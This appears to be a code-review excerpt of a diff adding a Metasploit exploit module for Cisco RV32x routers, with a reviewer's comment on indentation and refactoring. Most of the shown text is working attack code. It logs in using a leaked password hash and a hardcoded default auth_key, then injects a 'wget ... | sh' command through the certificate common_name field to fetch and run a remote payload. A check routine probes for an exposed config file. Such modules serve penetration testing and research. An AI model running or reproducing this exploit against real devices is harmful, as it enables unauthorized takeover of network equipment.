modules/exploits/linux/http/cisco_rv32x_rce.rb

```diff
@@ -0,0 +1,164 @@
+      print_status("Loging in as user #{username} using password hash.")
+      print_status("Using default auth_key 1964300002")
+      res2 = send_request_cgi({
+        'uri' => normalize_uri("cgi-bin","userLogin.cgi"),
+        'method' => 'POST',
+        'data' => "login=true&portalname=CommonPortal&password_expired=0&auth_key=1964300002&auth_server_pw=Y2lzY28%3D&submitStatus=0&pdStrength=1&username=#{username}&password=#{pass}&LanguageList=Deutsch&current_password=&new_password=&re_new_password="
+      })
+      if res2 and res2.code == 200
+        cookies = res2.get_cookies()
+        print_status("Successfully logged in as user #{username}.")
+        print_status("Got cookies: #{cookies}")
+        print_status("Sending payload. Staging via #{payload_url}.")
+        command_string = CGI::escape("'$(wget -q -O- #{payload_url}|sh)'")
+        if(command_string.length <= 50)
+          print_status("Staging command length looks good. Sending exploit!")
+        else
+          print_status("Warning: Staging command length probably too long. Trying anyway...")
+        end
+        res3 = send_request_cgi({
+          'uri' => normalize_uri("certificate_handle2.htm"),
+          'method' => 'POST',
+          'cookie' => cookies,
+              'vars_get' => {
+                 'type' => '4',
+              },
+              'vars_post' => {
+             'page' => 'self_generator.htm',
+                 'totalRules' => '1',
+                 'OpenVPNRules' => '30',
+                 'submitStatus' => '1',
+                 'log_ch' => '1',
+                 'type' => '4',
+                 'Counrty' => 'US',
+                 'state' => 'CA',
+                 'locality' => 'DC',
+                 'organization' => 'cc',
+                 'organization_unit' => 'A',
+                 'email' => 'any@example.com',
+                 'KeySize' => '512',
+                 'KeyLength' => '1024',
+                 'valid_days' => '30',
+                 'SelectSubject_c' => '1',
+                 'SelectSubject_s' => '1'
+              },
+              'data' => "common_name=#{command_string}"
+        })
+        if res3 and res3.code == 200
+          print_status("Successfully sent payload but nothing happend!")
+        else
+          print_status("Sending payload timed out. Ok.")
+        end
+      else
+        print_status("Could not login. Aborting.")
+      end
+    else
+    print_status("Could not download config. Aborting.")
+    end
+  end
+
+  def check
+    #Check if device is vulnerable by downloading the config
+    res = send_request_cgi({'uri'=>normalize_uri("cgi-bin","config.exp")})
+    if res and res.code == 200 and res.body =~ /PASSWD/
+      return Exploit::CheckCode::Vulnerable
+    end
+    if res and res.code == 200
+      return Exploit::CheckCode::Detected
+    end
+    return Exploit::CheckCode::Safe
+  end
+
+  def exploit
+    # Main function.
+    # Setting delay for the Stager.
+    begin
```

Comment:
The indentation in this method is messed up, and could also be refactored thusly:

```ruby
  def exploit
    # Main function. Setting delay for the Stager.
    Timeout.timeout(datastore['HTTPDELAY']) {super}
  rescue Timeout::Error
    print_status("Waiting for stager connection timed out. Try increasing the delay.")
  end
```